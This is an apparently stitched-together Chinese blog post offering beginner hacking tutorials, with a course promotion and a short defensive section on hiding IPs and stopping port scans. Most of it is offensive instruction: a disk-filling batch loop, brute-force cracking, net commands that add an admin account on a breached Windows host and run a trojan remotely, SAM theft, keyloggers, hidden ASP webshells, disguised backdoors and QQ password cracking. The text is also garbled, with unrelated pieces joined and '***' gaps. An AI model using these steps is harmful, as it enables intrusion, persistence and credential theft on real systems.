怎么入门黑客(黑客基础菜鸟入门教程)

访客4年前 (2020-09-22)关于黑客接单752

　　1，遇到长文件名怎么办？

　　c:program files

　　就用c:"program20%files"

　　2，遇到空格怎么办？

　　20%代替喽，或者xx yy=xxyy~1

　　3,如何做个很大的文件？

　　目的就是破坏啦！我不喜欢不过教教你们啦

　　@echo off

　　echo big > c:a.a

　　copy c:a.a+c:a.a c:a.a

　　goto h

　　注意不要乱来啊！

　　4，输入命令，没反应或反应不对。

　　：）请检查检查再检查命令的正确性，可能没有漏洞，那就闪人！看在你看到这里那么给我面子的份上，在给你几个吧！

　　五，密码暴力破解

　　这是最最原始，也是最最基本的攻击的方式了，利用字典文件或暴力模式，对密码进行探测。费时费力，但若有经验的话，可以缩短这一过程。具体 *** ： 1，找一个破解器，有ftp,http, *** tp,pop3,telnet等等类型。 2，找到一台相应的主机。 3，设定一番，上路吧！你可以睡觉，可以去machine(就是做作业)，可以去泡妞……就是不要傻等。为什么呢？因为会伤视力的：）怎么倒了一片，起来起来！ 4，万一成功了（之所以用这个词，是因为成功率很低的）表明你运气旺，赶紧下线，买彩票去吧^_^

　　大家好，这几天被cgi程序搞得头昏脑胀，主要还是51的错，什么破东西，那么多错误！现在只好暂时借人家的地方用。这是菜鸟操的最后第二节，说实话我还可以写很多的，但是作业还欠了一大堆：（为什么我没有满舟的**运？算了算了，我不合那种欺世盗名之辈一般见识，开始做操吧！不知道大家对unicode和溢出攻击是不是熟练了？没有的要加油哦！今天我们来谈谈权限的提升。在windows系统中，更高的权限掌握在administrators的手里，在xnix中称为root,我们要完全掌握一台机器，拿到admin是不可或缺的。首先说说最简单的:system to admin 当我们用溢出攻击成功后，其实我们已经拿到了system权限（具体看每种攻击而可能有所不同）这时我们很容易拿到admin权限。首先看看一下命令： net user 察看用户表 net user username pass /add(添加密码为pass的用户username) net localgroup 察看组 net localgroup guests cshu /add 把cshu用户加入guests组 net use \ipipc$ "password" /user:username 这是远程连接的命令假如我们溢出了11.11.22.22，那么这样做吧！ net user （看到了iusr_machinename的用户了，它一般没什么权限的） net user iusr_machinename cshu （把它的密码设为cshu） net localgroup administrators iusr_machinename /add（加入administrators组）这样我们就拥有了iusr_machinename这一账号，admin权限，简单吧！熟悉一下net use 命令： net use \11.11.22.22ipc$ "cshu" /user:iusr_machinename 建立连接 copy c:haha.exe \11.11.22.22admin$ 把haha.exe 复制到机器c:winntsystem32上，若是c$.d$,就表示c,d盘 net time \11.11.22.22 看到了时间了，比如是8点 at \11.11.22.22 8:03 haha.exe 就会在8点3分执行。 net use \11.11.22.22 /delete 断开连接应该是很简单的。

　　这样我们就可以随心所欲地操作11.11.22.22了，admin是更高权限，所以没有限制的：）是不是很简单？所以我是溢出是很厉害的攻击 *** 。　 3389知道吧！如果能进入，那么用上面的命令也可以轻易拿到admin的，不过呢，有3389漏洞的机器已经不多了。看你运气了！（本站有几篇关于3389的好文章）　总的来说，还是unicode的机器最多，为什么 *** 网管不会灭绝呢：）虽然unicode拿admin有一定难度，但还是要试试的。首先，我们检查一下unicode在这台机器上的权限，一般看读写权限和运行权限。用copy 或del命令便可确定读写权限，然后上传文件运行一下便可知道运行权限。 1，如果我们可以对winnt epair和winntconfig进行访问，sam文件就在里面（win2k里是sam，nt4里是sam._）那么用tftp 把get改成put下载下来，或者把它复制到inetpubwwwroot下，改成zip下载。拿到sam后，用lc3破解版暴力破解吧，这种 *** 比较费时。

　　2，要是有运行权限，拿就抛个木马上去吧！虽说木马可能也会没有权限，但自启动的模式在admin登陆后可能会自己提升了权限。要注意的是，更好放最新的木马，因为木马很容易被杀毒软件查杀！

　　3，其实和2差不多，只不过变成了键盘记录器，选个国产的，一般杀毒软件不会杀出来，认真配置好后传上去，下线睡觉或是做家务去！等到网管用了机器，密码就会被纪录下来，我们在去取，admin就顺利到手了：）

　　4，getadmin和pipeupadmin，前者是nt4用的，后者是2000。看看帮助知道使用 *** 后（其实猜都猜得到）就可以提升一个用户的权限，有一步登天的感觉！

　　5，手工做个bat文件，里面是建立用户等命令，然后把它放到自启动下，有很多途径：documents and settings下的开始菜单下的启动，知道了吧，至于要顺利放进去的话，会遇到空格长名等等问题，就看你的基本功了。win.ini里有load，加进去。还有便是注册表，好好研究一下regedit.

　　6，本地溢出。这个比较高深，我能告诉大家的只是，去四处找找本地溢出程序。总的来说，unicode改主页是非常简单的，但是若是要取得更高的权限，就要一番努力，上面的 *** 只是些思路，实际操作时需要具体处理，开动脑筋，把 *** 都结合起来。（是不是听起来有点玄？）

　　想想好像没有什么其他的途径要说了，什么？linux,呵呵，我还不大懂，就不在这里瞎说了。那今天就说到这里了，6里面我会说说后门 *** ，小问题和我的一点经验。期待吧

　　这是最后一节了，写的傻傻的，但我毕竟坚持下来了，值得鼓励！（偶尔阿q一下）在写菜鸟操的同时，我们的cshu(cshu.51.net)也在默默成长，但现在我要准备离开了，真是有点舍不得。在今后的日子里，还请大家多多支持cshu和christ,freedom他们

　　今天说点什么呢？没有主题，乱谈一通吧！首先我要吐一次血，当然是为了推荐一样东西，就是流光！（那么没创意，老土！）不管怎么说，小榕的流光应该是中国之一黑软，他综合了诸多的攻击手段，使攻击便捷化，当然可能让我们养成了懒惰的习惯。不会用流光的更好去学学。我来说说我自己觉得最有用的几个项目：

　　1，探测----扫描pop3/ftp/nt/sql主机，要是无目的地黑，那么用这个再合适不过了。进去后填好ip范围（范围可以扫大一点，它很快的），至于类型嘛，要是你要一大堆unicode，那么选择iis/frontpage再合适不过了，要是要更高的权限，sql是不错的选择。完成后，表格里会多出一大堆东西。 remote execute-x 这是几种不同的unicode，用它比用ie来执行方便多了，但是echo有问题（是我自己不会，会的朋友快教我） remote ftp pcaw file method-x 这是远程获取pc anywhere的密码文件，要使用的话，你首先要有一个ftp账号，去申请吧！顺利拿到cif文件后，用流光自带的工具就可以解开密码，很爽的！ remote ftp sam -x 拿sam的，还是用更好的lc3来解吧！ frontpage extended 这是frontpage扩展，不过不要高兴，是要密码的。但是若是后面跟了privilege hole的话，放声大笑吧！

　　（小心不要让邻居拿着菜刀冲进来）打开frontpage，打开站点就可以了！（不要忘）此外还有一点变通，大家肯定读的懂的。

　　2，探测----高级扫描工具。这可是流光4中的重头戏，综合了很多漏洞，还可以用plugin功能加入新的漏洞。这项功能很适合对某一站点进行探测，很快扫出漏洞后，流光会生成一个报告文件，其中包含漏洞的连接，要是你看不懂的话，建议你拿出x-scan，里面有漏洞描述的。

　　3，工具----nt管道远程命令，种植者，这两项功能对我们攻击nt来说是相当好用的。但前提是要有账号，相信在此之前你应该有几个了吧，那就快点试试吧！总的来说，流光的使用是非常简单的，其中也有不少工具值得我们一用，tools目录里有一些很好的工具，exploit里则有很多溢出攻击程序，前提是你应该会c,不会的话我也没办法，学会c起码要看10倍于菜鸟操的资料吧！另外给大家推荐一个站点：有什么漏洞的话就去那里找找，你会有所收获的。

　　然后我想说说一些黑站的经验。当我们用unicode控制一台机器时，我向大家推荐用asp木马，阿新的改良版，本站有下载的。上传asp文件前不要忘了修改list.asp中的地址信息，更好也放一个cmd.asp上去，运气好的话，可以运行命令的。上传好后，ie里输入其中index.asp的地址，呵呵，我们就能方便地管理其中的文件了，可以改网页，改代码，上传脚本文件麻烦？那就用它来生成吧！推荐他的更大原因便是----便于隐藏！

　　一般网站总有一个庞大的目录，选择一个深的，放进去，网管很难发现的：）最后对大家说一句，要是有备份目录（很多网站都有的），更好也放一份进去。有一次我用这个东西修改一家网站的首页，改了两三次网管也没删掉，可是突然一天不行了，原来他用了备份的网页（还算机灵吧）我想对大家说，对于国内网站，更好不要恶意去攻击，因为我们是中国人嘛！在5/1期间，我发现有一些国内站点被黑，留下的页面上不是poison box，而是中国人的话，这真是 *** 到了极点！大家千万不要学哦。还有，现在网上有很多还没有网页的主机，往往有很多漏洞，对于这种机器，竟有一些小人也会去改收页（比如上海那个姓杨的小子）这算什么？显示实力，炫耀技术？呵呵，见鬼去吧！我的建议是，不要改它的首页，而是努力去拿admin,控制它，这样我们有很多选择：肉鸡，等它有正式主页后可以黑，或者把我们的主页放上去！比申请好多了，权限又足！当然很危险：）这样做是不是有品位多了？

　　这样做是不是有品位多了？要是我们拿到了admin，但有时却不能执行一些命令，那很可能是因为服务启动的问题。试着用以下命令： net start termservice 启动win2k的终端控制 net start workstation 打开net use 功能 net start lanmanserver 打开ipc net start eventlog 启动日志（你不会那么傻吧！stop） net start schedule 打开计划(at) net start server 共享还有很多，net命令里去找吧！打开telnet

　　1，远程去运行ntlm.exe，流光里有

　　2，net stop telnet

　　3, net start telnet 我推荐几种后门：winshell（默认端口5277）相对于srv，它好一些。remotenc这个是榕哥的作品，可以以指定用户执行，还可以自己起服务的名字，很棒的！至于服务的名字，建议大家去看看win2k的进程名，学着起相类似的名字，要做到使网管看到了也不会引起警觉，或是有警觉也不敢去删，呵呵，这样就更好了！ *** 问题。

　　我推荐大家自己去做 *** ，控制了一台机器后，用snake前辈写的skserver去做个sock5。具体做法就不详细说了，因为比较普通，只要熟悉一下用法就可以了。做好了sock5，我们可以上oicq，下棋都用它，sock5 *** 可是很少见的哦！要是实在拿不到sock5,用http也可以，这里推荐一个软件tcp2http，它具有很多功能。在给个站点：dzc.126.com国内最更好的的 *** 站点，怕死的朋友千万不要错过。

　　不要把黑当作一种显示自己的行为，要是你想耍威风，用url欺骗来骗mm最合适了，还可以弄个yahoo什么的…… 不要在一项技术上停留过长时间，当你熟练掌握后，应该迅速学习下一个新技术。不要和被你黑的网管过多接触，前车之鉴哦。对于一台好机器要做好后门，不要轻易失去它。想好好学黑客的话，就常去各大论坛转转，仔细读教程，忘记聊天室和 *** 游戏吧！实践是更好的教程，再次重申！应该多学计算机的其他方面的知识，任何知识在一定场合都是有用的。编程技术……好像太难了，不过再难也要学。想不出来了………………

　　用 *** 、学 *** ，会 *** 、学安全，懂安全、保安全。

　　泰泰博客，自上线以来一直推出各种与互联网&&操作系统等相关内容，也许这些内容不是更好的，也许也不适合你，但泰泰真的是很用心的去做了，一路以来摸爬滚打，各种相关的知识都要学习，泰泰坚信这是一种锻炼，终会苦尽甘来的.....

　　还记之前有几位网友跟泰泰说过，“你的教程内容虽多，写的也很用心，但内容不是太全面，只适合单一需求的访客，有没有机会推出一套相对完整的教程呢？”泰泰听了这翻话后，回去纵观了自己的博客内容，不管是自己的个人站点、还是其它平台上的博客内容，确实是有点乱，也许是自己不爱分享（抱头）的原因吧！

　　经过一番思考后，泰泰还是觉得按网友说的，结合自己的专业特长，做一套完整教程吧！于是泰泰就开始筹备这一套视频的资料了，从筹备到课程正式上线，历时5个月左右的，为此泰泰把这5个月的空余时间基本都压榨了，常常战斗到深夜。同时在课程录制中也是各种挫折：资料丢失重做、PPT反复修改反复录制（只想做到更好）、后期剪辑、修音、平台审核不通过再次编辑、录制等等，但最终还是坚持下来，把这套课程出完了。虽说这套课程还是有很多的不足（泰泰是个追求完美的汉子）的地方，但泰泰真的是很用心、很用心、很用心的去做了，希望大家可以理解、多多包容泰泰这位成长者。同时泰泰也希望您留下更多的建议，泰泰会积极吸纳的。

　　在正式进行各种“黑客行为”之前，黑客会采取各种手段，探测（也可以说“侦察”）对方的主机信息，以便决定使用何种最有效的 *** 达到自己的目的。来看看黑客是如何获知最基本的 *** 信息——对方的IP地址；以及用户如何防范自己的IP泄漏。

　　■ 获取IP

　　“IP”作为Net用户的重要标示，是黑客首先需要了解的。获取的 *** 较多，黑客也会因不同的 *** 情况采取不同的 *** ，如：在局域网内使用Ping指令，Ping对方在 *** 中的名称而获得IP；在Internet上使用IP版的 *** 直接显示。而最“牛”，也是最有效的办法是截获并分析对方的 *** 数据包。如图1所示，这是用Windows 2003的 *** 监视器捕获的 *** 数据包，可能一般的用户比较难看懂这些16进制的代码，而对于了解 *** 知识的黑客，他们可以找到并直接通过软件解析截获后的数据包的IP包头信息，再根据这些信息了解具体的IP。

　　■ 隐藏IP

　　虽然侦察IP的 *** 多样，但用户可以隐藏IP的 *** 同样多样。就拿对付最有效的“数据包分析 *** ”而言，就可以安装能够自动去掉发送数据包包头IP信息的“Norton Internet Security 2003”。不过使用“Norton Internet Security”有些缺点，譬如：它耗费资源严重，降低计算机性能；在访问一些论坛或者网站时会受影响；不适合网吧用户使用等等。现在的个人用户采用最普及隐藏IP的 *** 应该是使用 *** ，由于使用 *** 服务器后，“转址服务”会对发送出去的数据包有所修改，致使“数据包分析”的 *** 失效。一些容易泄漏用户IP的 *** 软件（ *** 、MSN、IE等）都支持使用 *** 方式连接Internet，特别是 *** 使用“ezProxy”等 *** 软件连接后，IP版的 *** 都无法显示该IP地址。这里笔者介绍一款比较适合个人用户的简易 *** 软件—— *** 新手IP隐藏器（如图2），只要在“ *** 服务器”和“ *** 服务器端”填入正确的 *** 服务器地址和端口，即可对http使用 *** ，比较适合由于IE和 *** 泄漏IP的情况。

　　不过使用 *** 服务器，同样有一些缺点，如：会影响 *** 通讯的速度；需要 *** 上的一台能够提供 *** 能力的计算机，如果用户无法找到这样的 *** 服务器就不能使用 *** （查找 *** 服务器时，可以使用“ *** 猎手”等工具软件扫描 *** 上的 *** 服务器）。

　　虽然 *** 可以有效地隐藏用户IP，但高深的黑客亦可以绕过 *** ，查找到对方的真实IP地址，用户在何种情况下使用何种 *** 隐藏IP，也要因情况而论。

　　黑客的探测方式里除了侦察IP，还有一项——端口扫描。通过“端口扫描”可以知道被扫描的计算机哪些服务、端口是打开而没有被使用的（可以理解为寻找通往计算机的通道）。

　　一、端口扫描

　　网上很容易找到远程端口扫描的工具，如Superscan、IP Scanner、Fluxay（流光）等(如图1)，这就是用“流光”对试验主机192.168.1.8进行端口扫描后的结果。从中我们可以清楚地了解，该主机的哪些非常用端口是打开的；是否支持FTP、Web服务；且FTP服务是否支持“匿名”，以及IIS版本，是否有可以被成功攻破的IIS漏洞也显示出来。

　　二、阻止端口扫描

　　防范端口扫描的 *** 有两个：

　　1．关闭闲置和有潜在危险的端口

　　这个 *** 有些“死板”，它的本质是——将所有用户需要用到的正常计算机端口外的其他端口都关闭掉。因为就黑客而言，所有的端口都可能成为攻击的目标。换句话说“计算机的所有对外通讯的端口都存在潜在的危险”，而一些系统必要的通讯端口，如访问网页需要的HTTP（80端口）； *** （4000端口）等不能被关闭。

　　在Windows NT核心系统（Windows 2000/XP/ 2003）中要关闭掉一些闲置端口是比较方便的，可以采用“定向关闭指定服务的端口”和“只开放允许端口的方式”。计算机的一些 *** 服务会有系统分配默认的端口，将一些闲置的服务关闭掉，其对应的端口也会被关闭了（如图2）。进入“控制面板”、“管理工具”、“服务”项内，关闭掉计算机的一些没有使用的服务（如FTP服务、DNS服务、IIS Admin服务等等），它们对应的端口也被停用了。至于“只开放允许端口的方式”，可以利用系统的“TCP/IP筛选”功能实现，设置的时候，“只允许”系统的一些基本 *** 通讯需要的端口即可（关于“TCP/IP的筛选”，请参看本期应用专题）。

　　2．检查各端口，有端口扫描的症状时，立即屏蔽该端口

　　这种预防端口扫描的方式显然用户自己手工是不可能完成的，或者说完成起来相当困难，需要借助软件。这些软件就是我们常用的 *** 防火墙。

　　防火墙的工作原理是：首先检查每个到达你的电脑的数据包，在这个包被你机上运行的任何软件看到之前，防火墙有完全的否决权，可以禁止你的电脑接收Internet上的任何东西。当之一个请求建立连接的包被你的电脑回应后，一个“TCP/IP端口”被打开；端口扫描时，对方计算机不断和本地计算机建立连接，并逐渐打开各个服务所对应的“TCP/IP端口”及闲置端口，防火墙经过自带的拦截规则判断，就能够知道对方是否正进行端口扫描，并拦截掉对方发送过来的所有扫描需要的数据包。

　　现在市面上几乎所有 *** 防火墙都能够抵御端口扫描，在默认安装后，应该检查一些防火墙所拦截的端口扫描规则是否被选中，否则它会放行端口扫描，而只是在日志中留下信息而已。

　　黑客在进行攻击前的准备工作，就此介绍完毕。在以后的内容中，将转入正式的入侵、窃取和攻击等具体的介绍。

　　上网了吧，用Q了吧，被盗了吧，正常。想上网吧，想用Q吧，不想被盗Q吧，正常。那就来了解一些盗 *** 方面的知识吧！

　　一、名词解释

　　1.字典

　　2.暴力破解

　　所谓暴力破解，其实就是用无数的密码来与登录 *** 的密码进行核对，直到相同为止。暴力破解这种 *** 不仅可以运用在盗 *** 上，在破解其它密码时也常用这种 *** ，如：破解系统管理员密码等。这是最常用的一种破解方式。

　　二、原理分析

　　现在盗 *** 的软件有两种，本地破解和远程破解。看起来好像挺神秘的，其实说穿了就那么回事。下面咱们先来看看本地破解。

　　1.本地破解

　　本地破解其实就是用软件选择一个在本地登录过的 *** 号码，然后挂上字典进行密码核对。本地破解也可分为两种：暴力破解和本地记录。而暴力破解又分为两种：按顺序增加和通过字典对比。比如现在我要破解 *** 号为123456的密码，我可以用1作为密码进行核对，如果正确就可以盗走该号了，如果不正确，则用2来核对，还不正确，则用3，以此顺序增加，直到和密码相同为止。不过这样的破解效率是很低的，因为许多人的密码并不只是数字，所以这种 *** 并不常见。

　　平时常用的是通过对比字典中密码的 *** ，如果正确就盗走 *** 。因为字典可以做得很“智能化”，所以这种破解效率相对较高，特别是当你的密码是简单的数字，或是数字加一些英文名时特别明显。举个例子，比如我在网吧看到一MM的英文名为alice，密码位数为8位（我怎么知道的？晕！偷看到的嘛！）。从常理来讲，一般她的密码就是alice加上一些数字。于是我可以用易优超级字典生成器 *** 这样一个字典：把alice做为特殊字符排在密码的第1-5位（如图1），然后把基本字符里的数字全部选上，再将密码位数设为8，然后选好保存位置点“生成字典”。